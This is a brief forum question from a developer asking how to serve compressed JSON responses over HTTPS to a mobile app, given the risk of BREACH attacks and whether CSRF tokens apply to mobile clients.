• caglararli@hotmail.com
  • 05386281520

HTTPs compression, CSRF and mobile apps

Çağlar Arlı      -    38 Views

HTTPs compression, CSRF and mobile apps

I have a backend for a mobile application that has to serve large JSON responses from time to time, the transfer would be greatly helped by enabling compression, especially when the user has bad coverage.

Googling it seems like enabling compression for HTTPS endpoints is a bad practice due to BREACH attacks, looking into BREACH attacks it seems like the easiest way to mitigate them is using a CSRF token.

Looking into CSRF tokens for mobile it seems like the consensus is that they are not vulnerable to it (found some resources stating that using a signed double submit cookie would make it possible to implement it for mobile apps, but it not being strictly necessary)

This leaves me wonder what is the best way to provide compressed data to a mobile application from a backend?